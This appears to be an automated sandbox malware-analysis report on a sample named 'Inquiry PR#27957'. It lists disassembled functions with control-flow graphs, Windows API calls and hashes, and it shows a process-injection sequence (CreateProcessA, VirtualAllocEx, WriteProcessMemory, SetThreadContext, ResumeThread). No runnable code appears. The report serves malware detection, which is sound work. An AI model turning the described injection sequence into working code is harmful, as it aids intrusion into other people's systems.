                                                        • Opcode Fuzzy Hash: 72a8f6d3973fd4d83783bacf5114387d760418b325419f5256ddc3e8221a6285
                                                        • Instruction Fuzzy Hash: 9341F2B5D19228DFEB64CF64C944BE8BBF9EB4A301F0090EAD50DA7242C7746A85CF11
                                                        Function 073452D6 Relevance: 1.8, APIs: 1, Instructions: 251processCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1407 73452d6-7345375 1410 7345377-7345381 1407->1410 1411 73453ae-73453ce 1407->1411 1410->1411 1412 7345383-7345385 1410->1412 1416 7345407-7345436 1411->1416 1417 73453d0-73453da 1411->1417 1414 7345387-7345391 1412->1414 1415 73453a8-73453ab 1412->1415 1418 7345395-73453a4 1414->1418 1419 7345393 1414->1419 1415->1411 1427 734546f-7345529 CreateProcessA 1416->1427 1428 7345438-7345442 1416->1428 1417->1416 1420 73453dc-73453de 1417->1420 1418->1418 1421 73453a6 1418->1421 1419->1418 1422 73453e0-73453ea 1420->1422 1423 7345401-7345404 1420->1423 1421->1415 1425 73453ec 1422->1425 1426 73453ee-73453fd 1422->1426 1423->1416 1425->1426 1426->1426 1429 73453ff 1426->1429 1439 7345532-73455b8 1427->1439 1440 734552b-7345531 1427->1440 1428->1427 1430 7345444-7345446 1428->1430 1429->1423 1432 7345448-7345452 1430->1432 1433 7345469-734546c 1430->1433 1434 7345454 1432->1434 1435 7345456-7345465 1432->1435 1433->1427 1434->1435 1435->1435 1436 7345467 1435->1436 1436->1433 1450 73455c8-73455cc 1439->1450 1451 73455ba-73455be 1439->1451 1440->1439 1453 73455dc-73455e0 1450->1453 1454 73455ce-73455d2 1450->1454 1451->1450 1452 73455c0 1451->1452 1452->1450 1456 73455f0-73455f4 1453->1456 1457 73455e2-73455e6 1453->1457 1454->1453 1455 73455d4 1454->1455 1455->1453 1459 7345606-734560d 1456->1459 1460 73455f6-73455fc 1456->1460 1457->1456 1458 73455e8 1457->1458 1458->1456 1461 7345624 1459->1461 1462 734560f-734561e 1459->1462 1460->1459 1464 7345625 1461->1464 1462->1461 1464->1464
                                                        APIs
                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07345516
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1374101391.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7340000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: 384a8a3176b0d3cfed2b263f7ffdc098c11deacf270c5fd591a0a4508ac69c74
                                                        • Instruction ID: bee19a1254685514c98d18334bf204924fbaee1de01c395302dd73c74143987e
                                                        • Opcode Fuzzy Hash: 384a8a3176b0d3cfed2b263f7ffdc098c11deacf270c5fd591a0a4508ac69c74
                                                        • Instruction Fuzzy Hash: BFA148B1D00219DFEB24CFA8C8417EDBBF2EB48314F1481A9E809A7250DB75A995CF91
                                                        Function 073452E0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1465 73452e0-7345375 1467 7345377-7345381 1465->1467 1468 73453ae-73453ce 1465->1468 1467->1468 1469 7345383-7345385 1467->1469 1473 7345407-7345436 1468->1473 1474 73453d0-73453da 1468->1474 1471 7345387-7345391 1469->1471 1472 73453a8-73453ab 1469->1472 1475 7345395-73453a4 1471->1475 1476 7345393 1471->1476 1472->1468 1484 734546f-7345529 CreateProcessA 1473->1484 1485 7345438-7345442 1473->1485 1474->1473 1477 73453dc-73453de 1474->1477 1475->1475 1478 73453a6 1475->1478 1476->1475 1479 73453e0-73453ea 1477->1479 1480 7345401-7345404 1477->1480 1478->1472 1482 73453ec 1479->1482 1483 73453ee-73453fd 1479->1483 1480->1473 1482->1483 1483->1483 1486 73453ff 1483->1486 1496 7345532-73455b8 1484->1496 1497 734552b-7345531 1484->1497 1485->1484 1487 7345444-7345446 1485->1487 1486->1480 1489 7345448-7345452 1487->1489 1490 7345469-734546c 1487->1490 1491 7345454 1489->1491 1492 7345456-7345465 1489->1492 1490->1484 1491->1492 1492->1492 1493 7345467 1492->1493 1493->1490 1507 73455c8-73455cc 1496->1507 1508 73455ba-73455be 1496->1508 1497->1496 1510 73455dc-73455e0 1507->1510 1511 73455ce-73455d2 1507->1511 1508->1507 1509 73455c0 1508->1509 1509->1507 1513 73455f0-73455f4 1510->1513 1514 73455e2-73455e6 1510->1514 1511->1510 1512 73455d4 1511->1512 1512->1510 1516 7345606-734560d 1513->1516 1517 73455f6-73455fc 1513->1517 1514->1513 1515 73455e8 1514->1515 1515->1513 1518 7345624 1516->1518 1519 734560f-734561e 1516->1519 1517->1516 1521 7345625 1518->1521 1519->1518 1521->1521
                                                        APIs
                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07345516
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1374101391.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7340000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: 7dc49a64ba83eaf2ec06c633cf56a2a3f26c229004005eb7259e4ffaa140c6d4
                                                        • Instruction ID: 81ee58f3e33021c244195e96d06ae2195c5892a61823dc529da6988425d183c6
                                                        • Opcode Fuzzy Hash: 7dc49a64ba83eaf2ec06c633cf56a2a3f26c229004005eb7259e4ffaa140c6d4
                                                        • Instruction Fuzzy Hash: 7E9149B1D00219DFEB24CFA8C8417EDBBF2EF48314F1481A9E849A7250DB75A995CF91
                                                        Function 05434805 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1522 5434805-5434876 1524 5434881-5434888 1522->1524 1525 5434878-543487e 1522->1525 1526 5434893-54348cb 1524->1526 1527 543488a-5434890 1524->1527 1525->1524 1528 54348d3-5434932 CreateWindowExW 1526->1528 1527->1526 1529 5434934-543493a 1528->1529 1530 543493b-5434973 1528->1530 1529->1530 1534 5434980 1530->1534 1535 5434975-5434978 1530->1535 1536 5434981 1534->1536 1535->1534 1536->1536
                                                        APIs
                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05434922
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1364658564.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5430000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID: CreateWindow
                                                        • String ID:
                                                        • API String ID: 716092398-0
                                                        • Opcode ID: 5544a56f4aa3632310c832765e76ac4226280abfce49bf1de95c62bcd5113073
                                                        • Instruction ID: eb279c6f69aa0eb52262c9e20ce513dbf6586587cc2d14bd5a2e3fb712575aec
                                                        • Opcode Fuzzy Hash: 5544a56f4aa3632310c832765e76ac4226280abfce49bf1de95c62bcd5113073
                                                        • Instruction Fuzzy Hash: 1251C1B5D103499FDF14CFAAC885ADEBBB5FF48310F64812AE819AB220D7749845CF90
                                                        Function 054327D0 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1537 54327d0-5434876 1539 5434881-5434888 1537->1539 1540 5434878-543487e 1537->1540 1541 5434893-5434932 CreateWindowExW 1539->1541 1542 543488a-5434890 1539->1542 1540->1539 1544 5434934-543493a 1541->1544 1545 543493b-5434973 1541->1545 1542->1541 1544->1545 1549 5434980 1545->1549 1550 5434975-5434978 1545->1550 1551 5434981 1549->1551 1550->1549 1551->1551
                                                        APIs
                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05434922
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1364658564.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5430000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID: CreateWindow
                                                        • String ID:
                                                        • API String ID: 716092398-0
                                                        • Opcode ID: 1a9a7269ca67427dd9ea43581c2a4e69d6e367d4957c32524c32ec3d1bc020c2
                                                        • Instruction ID: 8f20aee0680ed9695fb8fe5ba541ffbbcb33b1f321d06b39fcd5f4ed343d3863
                                                        • Opcode Fuzzy Hash: 1a9a7269ca67427dd9ea43581c2a4e69d6e367d4957c32524c32ec3d1bc020c2
                                                        • Instruction Fuzzy Hash: BD51CFB5D003489FDF14CFAAC885ADEBBB5FF48310F24812AE819AB220D7759845CF90
                                                        Function 02DB58ED Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1552 2db58ed-2db58ee 1553 2db58f2 1552->1553 1554 2db58f0 1552->1554 1555 2db58f3-2db58f5 1553->1555 1556 2db58f6-2db59b9 CreateActCtxA 1553->1556 1554->1553 1555->1556 1558 2db59bb-2db59c1 1556->1558 1559 2db59c2-2db5a1c 1556->1559 1558->1559 1566 2db5a2b-2db5a2f 1559->1566 1567 2db5a1e-2db5a21 1559->1567 1568 2db5a31-2db5a3d 1566->1568 1569 2db5a40-2db5a70 1566->1569 1567->1566 1568->1569 1573 2db5a22 1569->1573 1574 2db5a72-2db5af4 1569->1574 1573->1566
                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 02DB59A9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1351684000.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2db0000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: 3fa2a31014f265232ca4c5a513d7bc92a071d09e9df455016ca3b2208f09908a
                                                        • Instruction ID: a4a35edf1f840aec2bd3995a71bf399481b96355ab406478a3d316a980b65077
                                                        • Opcode Fuzzy Hash: 3fa2a31014f265232ca4c5a513d7bc92a071d09e9df455016ca3b2208f09908a
                                                        • Instruction Fuzzy Hash: 4E41FFB5C04718CBDB25CFA9C884BCEBBB1BF49304F60806AD459AB251DB75694ACF50
                                                        Function 05432924 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1576 5432924-5436e1c 1579 5436e22-5436e27 1576->1579 1580 5436ecc-5436eec call 54327fc 1576->1580 1581 5436e7a-5436eb2 CallWindowProcW 1579->1581 1582 5436e29-5436e60 1579->1582 1588 5436eef-5436efc 1580->1588 1584 5436eb4-5436eba 1581->1584 1585 5436ebb-5436eca 1581->1585 1589 5436e62-5436e68 1582->1589 1590 5436e69-5436e78 1582->1590 1584->1585 1585->1588 1589->1590 1590->1588
                                                        APIs
                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 05436EA1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1364658564.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5430000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID: CallProcWindow
                                                        • String ID:
                                                        • API String ID: 2714655100-0
                                                        • Opcode ID: 592bd389e38696a5db5b9e89c703e848d3806aedae249cf7d7e55cf2d15f9217
                                                        • Instruction ID: a7e83ca3927f8e76ddcb360fa02ea8dd39168b0822c5d7f30919ce227bb28448
                                                        • Opcode Fuzzy Hash: 592bd389e38696a5db5b9e89c703e848d3806aedae249cf7d7e55cf2d15f9217
                                                        • Instruction Fuzzy Hash: 404138B9900205DFCB14CF99C489BAABBF5FF88314F258459E519AB321D771A849CBA0
                                                        Function 02DB44E0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1593 2db44e0-2db59b9 CreateActCtxA 1596 2db59bb-2db59c1 1593->1596 1597 2db59c2-2db5a1c 1593->1597 1596->1597 1604 2db5a2b-2db5a2f 1597->1604 1605 2db5a1e-2db5a21 1597->1605 1606 2db5a31-2db5a3d 1604->1606 1607 2db5a40-2db5a70 1604->1607 1605->1604 1606->1607 1611 2db5a22 1607->1611 1612 2db5a72-2db5af4 1607->1612 1611->1604
                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 02DB59A9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1351684000.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2db0000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: 6bc85fb617755763b7c7c96dd459ba96e63e101790bd23a3bb9f7091f8df975d
                                                        • Instruction ID: df58c2bb29593e84bbbf275cf52a73e9b2548c2699ebe7bafd374099975bf6ed
                                                        • Opcode Fuzzy Hash: 6bc85fb617755763b7c7c96dd459ba96e63e101790bd23a3bb9f7091f8df975d
                                                        • Instruction Fuzzy Hash: 9541FFB0C04718CBDB24DFA9C884BCEBBB1FF49304F60806AD419AB251DB716949CF90
                                                        Function 07345140 Relevance: 1.6, APIs: 1, Instructions: 86COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1614 7345140-7345144 1615 7345146-7345167 1614->1615 1616 7345169-73451d5 ReadProcessMemory 1614->1616 1615->1616 1622 73451d7-73451dd 1616->1622 1623 73451de-734520e 1616->1623 1622->1623
                                                        APIs
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 073451C8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1374101391.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7340000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessRead
                                                        • String ID:
                                                        • API String ID: 1726664587-0
                                                        • Opcode ID: f7b72c9b01ea3b699391b6cf96a9ba0df932f63fcad5de3219ab3e9bb6f8cfd2
                                                        • Instruction ID: 406e46856cbf3f67e1a1b518541d8dceced7c773229f9ddeceffe645962c1a8f
                                                        • Opcode Fuzzy Hash: f7b72c9b01ea3b699391b6cf96a9ba0df932f63fcad5de3219ab3e9bb6f8cfd2
                                                        • Instruction Fuzzy Hash: 863186B58003899FDF00CFAAC884BEEBBF0EF09310F14842AD969A7251D774A555CBA0
                                                        Function 07345050 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1627 7345050-73450a6 1629 73450b6-73450f5 WriteProcessMemory 1627->1629 1630 73450a8-73450b4 1627->1630 1632 73450f7-73450fd 1629->1632 1633 73450fe-734512e 1629->1633 1630->1629 1632->1633
                                                        APIs
                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 073450E8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1374101391.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7340000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessWrite
                                                        • String ID:
                                                        • API String ID: 3559483778-0
                                                        • Opcode ID: b2277f972a59115f577333e3938a607e9375528f1315d9d38329d6ad4405c80d
                                                        • Instruction ID: f84dfd8a697eded85a708cad5be733b74a66979ae4a9f280fa6e5dc1c0f19ca3
                                                        • Opcode Fuzzy Hash: b2277f972a59115f577333e3938a607e9375528f1315d9d38329d6ad4405c80d
                                                        • Instruction Fuzzy Hash: DC2166B5C003099FDB10CFA9C885BDEBBF1FF48310F10842AE958A7240DB789950CBA5
                                                        Function 07344EB9 Relevance: 1.6, APIs: 1, Instructions: 69threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1637 7344eb9-7344f0b 1640 7344f0d-7344f19 1637->1640 1641 7344f1b-7344f4b Wow64SetThreadContext 1637->1641 1640->1641 1643 7344f54-7344f84 1641->1643 1644 7344f4d-7344f53 1641->1644 1644->1643
                                                        APIs
                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07344F3E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1374101391.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7340000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0
                                                        • Opcode ID: 2bd11f9e689150fcbaf284733c0274b8c32a0e45e4fe89b453d75b5bf32dfe88
                                                        • Instruction ID: a7bbc013dd083c699a089736f83728b400d2480f8b0a7907f4cd3b20403e2555
                                                        • Opcode Fuzzy Hash: 2bd11f9e689150fcbaf284733c0274b8c32a0e45e4fe89b453d75b5bf32dfe88
                                                        • Instruction Fuzzy Hash: 4B21ACB19003099FEB10CFAAC4857EEBBF4EF48324F14842AD518A7241CB78A945CFA0
                                                        Function 07345058 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1648 7345058-73450a6 1650 73450b6-73450f5 WriteProcessMemory 1648->1650 1651 73450a8-73450b4 1648->1651 1653 73450f7-73450fd 1650->1653 1654 73450fe-734512e 1650->1654 1651->1650 1653->1654
                                                        APIs
                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 073450E8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1374101391.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7340000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessWrite
                                                        • String ID:
                                                        • API String ID: 3559483778-0
                                                        • Opcode ID: 487ce40242e27eb4776d4b5edbf4d6e9232d24cd41d3cfb29bd4945aa178da6b
                                                        • Instruction ID: 1b00876f8ae7d984632b394a265dda0740cd312daca22b1ef49d338ee9437b3d
                                                        • Opcode Fuzzy Hash: 487ce40242e27eb4776d4b5edbf4d6e9232d24cd41d3cfb29bd4945aa178da6b
                                                        • Instruction Fuzzy Hash: 872146B59003099FDB10CFAAC884BDEBBF5FF48310F108429E918A7250D778A954CBA1
                                                        Function 07344EC0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1658 7344ec0-7344f0b 1660 7344f0d-7344f19 1658->1660 1661 7344f1b-7344f4b Wow64SetThreadContext 1658->1661 1660->1661 1663 7344f54-7344f84 1661->1663 1664 7344f4d-7344f53 1661->1664 1664->1663
                                                        APIs
                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07344F3E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1374101391.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7340000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0
                                                        • Opcode ID: 51799a63e35dff5aeba2804edb567ccf61c4ed19cdcddcd7290ff562fe407166
                                                        • Instruction ID: 9dc35f253bc36bb70bddf3805b2248b63457f5330c4b5a904e64fbad2f3fb879
                                                        • Opcode Fuzzy Hash: 51799a63e35dff5aeba2804edb567ccf61c4ed19cdcddcd7290ff562fe407166
                                                        • Instruction Fuzzy Hash: 572188B1D003098FEB10DFAAC4857EEBBF4EF48314F54842AD959A7241CB78A945CFA0
                                                        Function 07345148 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1668 7345148-73451d5 ReadProcessMemory 1674 73451d7-73451dd 1668->1674 1675 73451de-734520e 1668->1675 1674->1675
                                                        APIs
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 073451C8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1374101391.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7340000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessRead
                                                        • String ID:
                                                        • API String ID: 1726664587-0
                                                        • Opcode ID: 3a8ea529b64b9b72b79974a75cb091e17b77194d0d31d3a726c46557141f9324
                                                        • Instruction ID: 41dc5059fbf90d01f3c54b1e16b4b683ba4668ba136bb7c2d9919b4d0829cfa1
                                                        • Opcode Fuzzy Hash: 3a8ea529b64b9b72b79974a75cb091e17b77194d0d31d3a726c46557141f9324
                                                        • Instruction Fuzzy Hash: 5D2116B18003499FDF10DFAAC885BEEBBF5FF48310F50842AE958A7250C775A555CBA4
                                                        Function 07344F90 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07345006
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1374101391.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7340000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: 4bbde715c781516fddf99f3bf9e2045006eca3afe8f6cc0a526117be862ea285
                                                        • Instruction ID: 25c81cd1875abf6997fd321830779a82ed49d18b84e62e1b7fca814d9fb9010e
                                                        • Opcode Fuzzy Hash: 4bbde715c781516fddf99f3bf9e2045006eca3afe8f6cc0a526117be862ea285
                                                        • Instruction Fuzzy Hash: AD1156768003489FDB10DFAAD8447EEBFF5EB48320F148419E559A7250CB75A550CFA1
                                                        Function 07344E09 Relevance: 1.6, APIs: 1, Instructions: 55threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1374101391.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7340000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: c7b0484ecc54bd56269393d6a9c6345ad6882475678b2f08b1e9f0d43dc1540a
                                                        • Instruction ID: 88fe746570067b5f5460ee506a3df669e5c80c7ad427b195c2c3e0feb2c8ea63
                                                        • Opcode Fuzzy Hash: c7b0484ecc54bd56269393d6a9c6345ad6882475678b2f08b1e9f0d43dc1540a
                                                        • Instruction Fuzzy Hash: B9119AB58043588FDB24DFAAC4457EEFBF4EF48320F24842AC519A7250CB75A984CFA4
                                                        Function 02DBD180 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02DBDF01,00000800,00000000,00000000), ref: 02DBE112
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1351684000.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2db0000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 20310dc5c6a136048c1adeed670be94dd15fb2545a52a8ae02170c3efd31ce93
                                                        • Instruction ID: a0a4814065286c9e44c3055ace588ffdffd79ab7e3efea7aa88a4501cb53c334
                                                        • Opcode Fuzzy Hash: 20310dc5c6a136048c1adeed670be94dd15fb2545a52a8ae02170c3efd31ce93
                                                        • Instruction Fuzzy Hash: F711FFB6904248CFDB10CF9AC848ADAFBF4EB48310F50842AE95AA7310C375A945CFA1
                                                        Function 07344F98 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07345006
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1374101391.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7340000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: 76d6a1d9b54ed4bf3f3c86ce9b33a9ec103580c8a7f085e3b959411008b45acf
                                                        • Instruction ID: a10aaba849b83e12d184b68a10d9a664485f3e4d1cae1fe499e19caf4bf62416
                                                        • Opcode Fuzzy Hash: 76d6a1d9b54ed4bf3f3c86ce9b33a9ec103580c8a7f085e3b959411008b45acf
                                                        • Instruction Fuzzy Hash: 851137B58003499FDF10DFAAC844BDEBBF5EF48310F148429E559A7250C775A554CFA1
                                                        Function 07344E10 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1374101391.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7340000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: 0f594c59e3affa44b8c28d5822907c6dd4a8e37af803899d4a399d7f72a66340
                                                        • Instruction ID: 8ca7f4db04358f50a9b0e3c298f1c9320421a0d4ae99d69451bfe46898aae900
                                                        • Opcode Fuzzy Hash: 0f594c59e3affa44b8c28d5822907c6dd4a8e37af803899d4a399d7f72a66340
                                                        • Instruction Fuzzy Hash: A21166B18003488FDB10DFAAC4457EEFBF4EB88324F248429C519A7250CB75A944CFA4
                                                        Function 07349580 Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 073495E5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1374101391.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7340000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID: MessagePost
                                                        • String ID:
                                                        • API String ID: 410705778-0
                                                        • Opcode ID: 793077651c29c5294a5c7b856f7425167ac676c1b63092d4e8e5cb67677047a2
                                                        • Instruction ID: 6b8a0eddf797e916c47549ef0f1508ed6c5346683e73984f6c00f95e2debdb57
                                                        • Opcode Fuzzy Hash: 793077651c29c5294a5c7b856f7425167ac676c1b63092d4e8e5cb67677047a2
                                                        • Instruction Fuzzy Hash: 4F1122B5800349DFDB10DF9AC485BDEBBF8EB48320F20881AE958A7210D375A944CFA0
                                                        Function 07347850 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 073495E5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1374101391.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7340000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID: MessagePost
                                                        • String ID:
                                                        • API String ID: 410705778-0
                                                        • Opcode ID: 633cdf90fded12b81e490c589707e4334a6081fe6b49a676f260a5ab19cdf4cd
                                                        • Instruction ID: da213482752f89597ed03bdab4faa65a0cfe1e5668671222b006d7d4a447aad1
                                                        • Opcode Fuzzy Hash: 633cdf90fded12b81e490c589707e4334a6081fe6b49a676f260a5ab19cdf4cd
                                                        • Instruction Fuzzy Hash: 651133B5800349DFDB10DF8AC484BDEBBF8EB48320F208459E958A7210C375A944CFA0
